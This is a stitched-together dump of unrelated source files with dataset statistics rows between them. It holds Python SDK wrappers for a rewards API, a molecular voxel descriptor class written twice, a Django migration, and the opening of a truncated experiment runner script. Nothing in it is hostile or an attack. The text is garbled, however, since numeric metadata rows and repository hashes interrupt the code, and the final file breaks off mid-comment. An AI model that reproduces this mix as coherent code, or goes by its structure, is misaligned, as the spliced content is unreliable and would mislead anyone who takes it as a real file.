@same_doc_as(DeleteReward)
def delete_reward(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteReward.create(
reward_id=reward_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteReward)
async def delete_reward_async(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteReward.create(
reward_id=reward_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportRewards)
def export_rewards(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportRewards.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportRewards)
async def export_rewards_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportRewards.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward)
def get_reward(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward.create(
reward_id=reward_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward)
async def get_reward_async(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward.create(
reward_id=reward_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward1)
def get_reward_1(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward1.create(
reward_id=reward_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetReward1)
async def get_reward_1_async(reward_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetReward1.create(
reward_id=reward_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetRewardByCode)
def get_reward_by_code(reward_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetRewardByCode.create(
reward_code=reward_code,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetRewardByCode)
async def get_reward_by_code_async(reward_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetRewardByCode.create(
reward_code=reward_code,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportRewards)
def import_rewards(replace_existing: bool, file: Optional[Any] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportRewards.create(
replace_existing=replace_existing,
file=file,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportRewards)
async def import_rewards_async(replace_existing: bool, file: Optional[Any] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportRewards.create(
replace_existing=replace_existing,
file=file,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards)
def query_rewards(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewardsSortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards)
async def query_rewards_async(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewardsSortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards1)
def query_rewards_1(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewards1SortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards1.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryRewards1)
async def query_rewards_1_async(event_topic: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, sort_by: Optional[List[Union[str, QueryRewards1SortByEnum]]] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryRewards1.create(
event_topic=event_topic,
limit=limit,
offset=offset,
sort_by=sort_by,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateReward)
def update_reward(reward_id: str, body: Optional[RewardUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateReward.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateReward)
async def update_reward_async(reward_id: str, body: Optional[RewardUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateReward.create(
reward_id=reward_id,
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
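# Usage sketch: assuming the SDK has been initialized, every wrapper above
# follows the same calling convention -- each returns a (result, error) tuple,
# and the namespace is resolved from the SDK configuration when not passed
# explicitly. The reward id below is a placeholder.
#
#     reward, error = get_reward(reward_id="<reward-id>")
#     if error:
#         raise RuntimeError(f"get_reward failed: {error}")
#     print(reward)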
| 38.901685 | 293 | 0.715214 | 1,654 | 13,849 | 5.773882 | 0.078597 | 0.117487 | 0.082932 | 0.055288 | 0.805654 | 0.79623 | 0.795183 | 0.795183 | 0.78534 | 0.78534 | 0 | 0.001872 | 0.189905 | 13,849 | 355 | 294 | 39.011268 | 0.849363 | 0.055311 | 0 | 0.750877 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038596 | false | 0 | 0.115789 | 0 | 0.308772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4f3a740b415d7c150ed78898176300696f8bf42e | 15,927 | py | Python | Molecule.py | hassanmohsin/Molecule | 260c7c5d3df68e6c683c6485016d18f5350142e4 | [
"MIT"
] | null | null | null | Molecule.py | hassanmohsin/Molecule | 260c7c5d3df68e6c683c6485016d18f5350142e4 | [
"MIT"
] | null | null | null | Molecule.py | hassanmohsin/Molecule | 260c7c5d3df68e6c683c6485016d18f5350142e4 | [
"MIT"
] | null | null | null |
# coding: utf-8
# van der Waals radii are taken from A. Bondi, J. Phys. Chem., 68, 441 - 452, 1964,
# except the value for H, which is taken from R.S. Rowland & R. Taylor, J. Phys. Chem., 100, 7384 - 7391, 1996.
# Radii that are not available in either of these publications default to RvdW = 2.00.
# The radii for the ions (Na, K, Cl, Ca, Mg, and Cs) are based on the CHARMM27 Rmin/2 parameters for (SOD, POT, CLA, CAL, MG, CES) by default.
from __future__ import print_function, absolute_import
from collections import OrderedDict
import numpy as np
from scipy import spatial
import pybel
import os
import glob
from tqdm import *
# Molecule class that assigns each atom's properties to the single closest voxel
class Molecule1:
mol = None
coords = []
charges = []
elements = []
numAtoms = 0
filename = ""
_dir_name = ""
_element_radii = {
'Ac': 2.0,
'Ag': 1.72,
'Al': 2.0,
'Am': 2.0,
'Ar': 1.88,
'As': 1.85,
'At': 2.0,
'Au': 1.66,
'B': 2.0,
'Ba': 2.0,
'Be': 2.0,
'Bh': 2.0,
'Bi': 2.0,
'Bk': 2.0,
'Br': 1.85,
'C': 1.7,
'Ca': 1.37,
'Cd': 1.58,
'Ce': 2.0,
'Cf': 2.0,
'Cl': 2.27,
'Cm': 2.0,
'Co': 2.0,
'Cr': 2.0,
'Cs': 2.1,
'Cu': 1.4,
'Db': 2.0,
'Ds': 2.0,
'Dy': 2.0,
'Er': 2.0,
'Es': 2.0,
'Eu': 2.0,
'F': 1.47,
'Fe': 2.0,
'Fm': 2.0,
'Fr': 2.0,
'Ga': 1.07,
'Gd': 2.0,
'Ge': 2.0,
'H': 1.2,
'He': 1.4,
'Hf': 2.0,
'Hg': 1.55,
'Ho': 2.0,
'Hs': 2.0,
'I': 1.98,
'In': 1.93,
'Ir': 2.0,
'K': 1.76,
'Kr': 2.02,
'La': 2.0,
'Li': 1.82,
'Lr': 2.0,
'Lu': 2.0,
'Md': 2.0,
'Mg': 1.18,
'Mn': 2.0,
'Mo': 2.0,
'Mt': 2.0,
'N': 1.55,
'Na': 1.36,
'Nb': 2.0,
'Nd': 2.0,
'Ne': 1.54,
'Ni': 1.63,
'No': 2.0,
'Np': 2.0,
'O': 1.52,
'Os': 2.0,
'P': 1.8,
'Pa': 2.0,
'Pb': 2.02,
'Pd': 1.63,
'Pm': 2.0,
'Po': 2.0,
'Pr': 2.0,
'Pt': 1.72,
'Pu': 2.0,
'Ra': 2.0,
'Rb': 2.0,
'Re': 2.0,
'Rf': 2.0,
'Rg': 2.0,
'Rh': 2.0,
'Rn': 2.0,
'Ru': 2.0,
'S': 1.8,
'Sb': 2.0,
'Sc': 2.0,
'Se': 1.9,
'Sg': 2.0,
'Si': 2.1,
'Sm': 2.0,
'Sn': 2.17,
'Sr': 2.0,
'Ta': 2.0,
'Tb': 2.0,
'Tc': 2.0,
'Te': 2.06,
'Th': 2.0,
'Ti': 2.0,
'Tl': 1.96,
'Tm': 2.0,
'U': 1.86,
'V': 2.0,
'W': 2.0,
'X': 1.5,
'Xe': 2.16,
'Y': 2.0,
'Yb': 2.0,
'Zn': 1.39,
'Zr': 2.0
}
_element_mapping = {
'H': 'H',
'HS': 'H',
'HD': 'H',
'A': 'C',
'C': 'C',
'N': 'N',
'NA': 'N',
'NS': 'N',
'O': 'O',
'OA': 'O',
'OS': 'O',
'F': 'F',
'Mg': 'Mg',
'MG': 'Mg',
'P': 'P',
'S': 'S',
'SA': 'S',
'Cl': 'Cl',
'CL': 'Cl',
'Ca': 'Ca',
'CA': 'Ca',
'Fe': 'Fe',
'FE': 'Fe',
'Zn': 'Zn',
'ZN': 'Zn',
'BR': 'Br',
'Br': 'Br',
'I': 'I',
'MN': 'Mn'
}
def __init__(self, file):
self.filename = file
self._read_file()
self.mol = next(pybel.readfile('pdbqt', file))
def _read_file(self):
with open(self.filename, 'r') as f:
content = f.readlines()
# Split each line on whitespace
content = [s.split() for s in content]
# Keep only the lines that start with "ATOM"
content = [line for line in content if line[0]=="ATOM"]
# Get the attributes
self.coords = np.array([line[-7:-4] for line in content], dtype=np.float32)
self.charges = np.array([line[-2] for line in content], dtype=np.float32)
self.elements = np.array([line[-1] for line in content], dtype=object)
self.numAtoms = self.elements.shape[0]
def getVoxelDescriptors(self, side=1):
voxel_side = side # in Angstrom
# Get the channels for each of the properties
elements = np.array([e.upper() for e in self.elements])
properties = OrderedDict()
_prop_order = ['hydrophobic', 'aromatic', 'hbond_acceptor', 'hbond_donor', 'positive_ionizable',
'negative_ionizable', 'metal', 'occupancies']
properties['hydrophobic'] = (self.elements == 'C') | (self.elements == 'A')
properties['aromatic'] = self.elements == 'A'
properties['hbond_acceptor'] = (self.elements == 'NA') | (self.elements == 'NS') | (self.elements == 'OA') | (self.elements == 'OS') | (self.elements == 'SA')
#properties['hbond_acceptor'] = np.array([a.OBAtom.IsHbondAcceptor() for a in self.mol.atoms], dtype=np.bool)
properties['hbond_donor'] = np.array([a.OBAtom.IsHbondDonor() for a in self.mol.atoms], dtype=np.bool)
properties['positive_ionizable'] = self.charges > 0.0
properties['negative_ionizable'] = self.charges < 0.0
properties['metal'] = (self.elements == 'MG') | (self.elements == 'ZN') | (self.elements == 'MN') | (self.elements == 'CA') | (self.elements == 'FE')
properties['occupancies'] = (self.elements != 'H') & (self.elements != 'HS') & (self.elements != 'HD')
channels = np.zeros((len(self.elements), len(properties)), dtype=bool)
for i, p in enumerate(_prop_order):
channels[:, i] = properties[p]
# Now get the van der Waals radii for each of the atoms
vdw_radii = np.array([self._element_radii[self._element_mapping[elm]]
for elm in self.elements], dtype=np.float32)
# Multiply the vdW radii into the channels: False entries become zero, True entries take the atom's vdW radius
channels = vdw_radii[:, np.newaxis] * channels.astype(np.float32)
# Get the bounding box for the molecule
max_coord = np.max(self.coords, axis=0) # np.squeeze?
min_coord = np.min(self.coords, axis=0) # np.squeeze?
# Calculate the number of voxels required
N = np.ceil((max_coord - min_coord) / voxel_side).astype(int) + 1
# Get the center of each voxel descriptor
xrange = [min_coord[0] + voxel_side * x for x in range(0, N[0])]
yrange = [min_coord[1] + voxel_side * x for x in range(0, N[1])]
zrange = [min_coord[2] + voxel_side * x for x in range(0, N[2])]
centers = np.zeros((N[0], N[1], N[2], 3))
for i, x in enumerate(xrange):
for j, y in enumerate(yrange):
for k, z in enumerate(zrange):
centers[i, j, k, :] = np.array([x, y, z])
centers = centers.reshape((-1, 3))
features = np.zeros((len(centers), channels.shape[1]), dtype=np.float32)
#features = np.zeros((len(centers)), dtype=np.float32)
for i in range(self.numAtoms):
# Get the atom coordinates
atom_coordinates = self.coords[i]
# Get the closest voxel
c_voxel_id = spatial.distance.cdist(atom_coordinates.reshape((-1, 3)), centers).argmin()
c_voxel = centers[c_voxel_id]
# Calculate the pseudo-potential n = 1 - exp(-(r_vdw / d)^12), which approaches 1 as the atom center nears the voxel center
voxel_distance = np.linalg.norm(atom_coordinates - c_voxel)
x = channels[i] / voxel_distance
#x = self._element_radii[self._element_mapping[self.elements[i]]] / voxel_distance
n = 1.0 - np.exp(-np.power(x, 12))
features[c_voxel_id] = n
#break
return features.reshape((N[0], N[1], N[2], -1))
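# A minimal usage sketch (assuming a PDBQT file such as 'ligand.pdbqt' exists):
#
#     mol = Molecule1('ligand.pdbqt')
#     features = mol.getVoxelDescriptors(side=1)  # shape (Nx, Ny, Nz, 8)
#     print(features.shape)
#
# Molecule2 below provides the same interface with a smoother 9-voxel assignment.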
# Molecule class that assigns each atom's properties to the closest voxel and its 8 nearest neighbors
class Molecule2:
mol = None
coords = []
charges = []
elements = []
numAtoms = 0
filename = ""
_dir_name = ""
_element_radii = {
'Ac': 2.0,
'Ag': 1.72,
'Al': 2.0,
'Am': 2.0,
'Ar': 1.88,
'As': 1.85,
'At': 2.0,
'Au': 1.66,
'B': 2.0,
'Ba': 2.0,
'Be': 2.0,
'Bh': 2.0,
'Bi': 2.0,
'Bk': 2.0,
'Br': 1.85,
'C': 1.7,
'Ca': 1.37,
'Cd': 1.58,
'Ce': 2.0,
'Cf': 2.0,
'Cl': 2.27,
'Cm': 2.0,
'Co': 2.0,
'Cr': 2.0,
'Cs': 2.1,
'Cu': 1.4,
'Db': 2.0,
'Ds': 2.0,
'Dy': 2.0,
'Er': 2.0,
'Es': 2.0,
'Eu': 2.0,
'F': 1.47,
'Fe': 2.0,
'Fm': 2.0,
'Fr': 2.0,
'Ga': 1.07,
'Gd': 2.0,
'Ge': 2.0,
'H': 1.2,
'He': 1.4,
'Hf': 2.0,
'Hg': 1.55,
'Ho': 2.0,
'Hs': 2.0,
'I': 1.98,
'In': 1.93,
'Ir': 2.0,
'K': 1.76,
'Kr': 2.02,
'La': 2.0,
'Li': 1.82,
'Lr': 2.0,
'Lu': 2.0,
'Md': 2.0,
'Mg': 1.18,
'Mn': 2.0,
'Mo': 2.0,
'Mt': 2.0,
'N': 1.55,
'Na': 1.36,
'Nb': 2.0,
'Nd': 2.0,
'Ne': 1.54,
'Ni': 1.63,
'No': 2.0,
'Np': 2.0,
'O': 1.52,
'Os': 2.0,
'P': 1.8,
'Pa': 2.0,
'Pb': 2.02,
'Pd': 1.63,
'Pm': 2.0,
'Po': 2.0,
'Pr': 2.0,
'Pt': 1.72,
'Pu': 2.0,
'Ra': 2.0,
'Rb': 2.0,
'Re': 2.0,
'Rf': 2.0,
'Rg': 2.0,
'Rh': 2.0,
'Rn': 2.0,
'Ru': 2.0,
'S': 1.8,
'Sb': 2.0,
'Sc': 2.0,
'Se': 1.9,
'Sg': 2.0,
'Si': 2.1,
'Sm': 2.0,
'Sn': 2.17,
'Sr': 2.0,
'Ta': 2.0,
'Tb': 2.0,
'Tc': 2.0,
'Te': 2.06,
'Th': 2.0,
'Ti': 2.0,
'Tl': 1.96,
'Tm': 2.0,
'U': 1.86,
'V': 2.0,
'W': 2.0,
'X': 1.5,
'Xe': 2.16,
'Y': 2.0,
'Yb': 2.0,
'Zn': 1.39,
'Zr': 2.0
}
_element_mapping = {
'H': 'H',
'HS': 'H',
'HD': 'H',
'A': 'C',
'C': 'C',
'N': 'N',
'NA': 'N',
'NS': 'N',
'O': 'O',
'OA': 'O',
'OS': 'O',
'F': 'F',
'Mg': 'Mg',
'MG': 'Mg',
'P': 'P',
'S': 'S',
'SA': 'S',
'Cl': 'Cl',
'CL': 'Cl',
'Ca': 'Ca',
'CA': 'Ca',
'Fe': 'Fe',
'FE': 'Fe',
'Zn': 'Zn',
'ZN': 'Zn',
'BR': 'Br',
'Br': 'Br',
'I': 'I',
'MN': 'Mn'
}
def __init__(self, file):
self.filename = file
self._read_file()
self.mol = next(pybel.readfile('pdbqt', file))
def _read_file(self):
with open(self.filename, 'r') as f:
content = f.readlines()
# Split each line on whitespace
content = [s.split() for s in content]
# Keep only the lines that start with "ATOM"
content = [line for line in content if line[0]=="ATOM"]
# Get the attributes
self.coords = np.array([line[-7:-4] for line in content], dtype=np.float32)
self.charges = np.array([line[-2] for line in content], dtype=np.float32)
self.elements = np.array([line[-1] for line in content], dtype=object)
self.numAtoms = self.elements.shape[0]
def getVoxelDescriptors(self, side=1):
voxel_side = side # in Angstrom
# Get the channels for each of the properties
elements = np.array([e.upper() for e in self.elements])
properties = OrderedDict()
_prop_order = ['hydrophobic', 'aromatic', 'hbond_acceptor', 'hbond_donor', 'positive_ionizable',
'negative_ionizable', 'metal', 'occupancies']
properties['hydrophobic'] = (self.elements == 'C') | (self.elements == 'A')
properties['aromatic'] = self.elements == 'A'
properties['hbond_acceptor'] = (self.elements == 'NA') | (self.elements == 'NS') | (self.elements == 'OA') | (self.elements == 'OS') | (self.elements == 'SA')
#properties['hbond_acceptor'] = np.array([a.OBAtom.IsHbondAcceptor() for a in self.mol.atoms], dtype=np.bool)
properties['hbond_donor'] = np.array([a.OBAtom.IsHbondDonor() for a in self.mol.atoms], dtype=np.bool)
properties['positive_ionizable'] = self.charges > 0.0
properties['negative_ionizable'] = self.charges < 0.0
properties['metal'] = (self.elements == 'MG') | (self.elements == 'ZN') | (self.elements == 'MN') | (self.elements == 'CA') | (self.elements == 'FE')
properties['occupancies'] = (self.elements != 'H') & (self.elements != 'HS') & (self.elements != 'HD')
channels = np.zeros((len(self.elements), len(properties)), dtype=bool)
for i, p in enumerate(_prop_order):
channels[:, i] = properties[p]
# Now get the van der Waals radii for each of the atoms
vdw_radii = np.array([self._element_radii[self._element_mapping[elm]]
for elm in self.elements], dtype=np.float32)
# Multiply the vdW radii into the channels: False entries become zero, True entries take the atom's vdW radius
channels = vdw_radii[:, np.newaxis] * channels.astype(np.float32)
# Get the bounding box for the molecule
max_coord = np.max(self.coords, axis=0) # np.squeeze?
min_coord = np.min(self.coords, axis=0) # np.squeeze?
# Calculate the number of voxels required
N = np.ceil((max_coord - min_coord) / voxel_side).astype(int) + 1
# Get the center of each voxel descriptor
xrange = [min_coord[0] + voxel_side * x for x in range(0, N[0])]
yrange = [min_coord[1] + voxel_side * x for x in range(0, N[1])]
zrange = [min_coord[2] + voxel_side * x for x in range(0, N[2])]
centers = np.zeros((N[0], N[1], N[2], 3))
for i, x in enumerate(xrange):
for j, y in enumerate(yrange):
for k, z in enumerate(zrange):
centers[i, j, k, :] = np.array([x, y, z])
centers = centers.reshape((-1, 3))
features = np.zeros((len(centers), channels.shape[1]), dtype=np.float32)
#features = np.zeros((len(centers)), dtype=np.float32)
for i in range(self.numAtoms):
# Get the atom coordinates
atom_coordinates = self.coords[i]
# Get the ids and distances of the closest voxel and its 8 nearest neighbors
voxel_distances = spatial.distance.cdist(atom_coordinates.reshape((-1, 3)), centers).reshape(-1)
c_voxel_ids = voxel_distances.argsort()[:9]
c_voxel_dist = np.sort(voxel_distances)[:9]
# Calculate the pseudo-potential n = 1 - exp(-(r_vdw / d)^12) for each of the 9 voxels
#voxel_distance = np.linalg.norm(atom_coordinates - c_voxel)
x = channels[i] / c_voxel_dist.reshape(-1)[:, np.newaxis]
#x = self._element_radii[self._element_mapping[self.elements[i]]] / voxel_distance
n = 1.0 - np.exp(-np.power(x, 12))
# Take the elementwise maximum so a later atom never overwrites a larger
# contribution already stored in these voxels
max_feat = np.maximum(features[c_voxel_ids], n)
features[c_voxel_ids] = max_feat
return features.reshape((N[0], N[1], N[2], -1))
| 30.806576 | 166 | 0.455955 | 2,167 | 15,927 | 3.287494 | 0.164282 | 0.039865 | 0.019652 | 0.017967 | 0.899214 | 0.894161 | 0.889669 | 0.889669 | 0.889669 | 0.875351 | 0 | 0.064962 | 0.364036 | 15,927 | 517 | 167 | 30.806576 | 0.638365 | 0.13857 | 0 | 0.941176 | 0 | 0 | 0.077525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014118 | false | 0 | 0.018824 | 0 | 0.084706 | 0.002353 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
4f8e04fc759c0932e7f37a76137a65ef74d5e1e7 | 2,119 | py | Python | security/migrations/0002_auto_20210727_1158.py | TechVictorKE/neighborhood-watch | b7bd73ccfbc350b9799e15cce3306d929a8307e2 | [
"MIT"
] | null | null | null | security/migrations/0002_auto_20210727_1158.py | TechVictorKE/neighborhood-watch | b7bd73ccfbc350b9799e15cce3306d929a8307e2 | [
"MIT"
] | null | null | null | security/migrations/0002_auto_20210727_1158.py | TechVictorKE/neighborhood-watch | b7bd73ccfbc350b9799e15cce3306d929a8307e2 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.1 on 2021-07-27 08:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('security', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='authorities',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='blogpost',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='business',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='comment',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='health',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='healthservices',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='neighbourhood',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='notifications',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='profile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 35.915254 | 108 | 0.59698 | 216 | 2,119 | 5.685185 | 0.212963 | 0.087948 | 0.183225 | 0.212541 | 0.789902 | 0.789902 | 0.789902 | 0.789902 | 0.789902 | 0.789902 | 0 | 0.012459 | 0.280321 | 2,119 | 58 | 109 | 36.534483 | 0.792787 | 0.021236 | 0 | 0.692308 | 1 | 0 | 0.069015 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019231 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
96cbd5c6f3e31a4e61e41418991ba6a28beee2d4 | 30,731 | py | Python | runner.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | 2 | 2020-08-24T15:59:59.000Z | 2020-08-24T17:03:30.000Z | runner.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | null | null | null | runner.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | null | null | null | import itertools
import os
import subprocess
import sys
import asyncio
import copy
import glob
import shutil
from pathlib import Path
from runner_utils import main, slurm_main, construct_varying_keys, construct_jobs
local = '--local' in sys.argv
greene = '--greene' in sys.argv
dry_run = '--dry-run' in sys.argv
GPUS = [0, 1, 2, 3]
MULTIPLEX = 2
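# Sketch of the grid convention used throughout this file (assuming
# construct_jobs expands each dict as a standard sweep helper): every grid is
# a list of dicts mapping flag names to lists of values, and each dict expands
# to the cross product of its value lists, e.g.
#
#     grid = [{"_main": ["main.py"], "seed": [0, 1], "lr": [1e-3, 1e-4]}]
#     # -> 4 jobs: main.py --seed {0,1} --lr {1e-3,1e-4}
#
# Jobs are then launched locally across GPUS (MULTIPLEX runs per GPU) or
# submitted as SLURM jobs via slurm_main.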
# basename = "pv100_sacqex_v2"
# grid = [
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "max_episodes": [500],
# "max_steps": [100],
# "seed": list(range(8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# ]
# basename = "pv100_bbe_v4_updates"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "max_episodes": [500],
# "seed": list(range(8)),
# "no_exploration": [False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [4],
# "update_target_every": [4],
# },
# {
# # define the task
# "_main": ["main_bbe.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "max_episodes": [500],
# "seed": list(range(8)),
# "no_exploration": [False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# },
# ]
# basename = "wex_walk_narrow_sparse_v3_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker_explore"],
# "task": ["walk_narrow_sparse"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [5e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
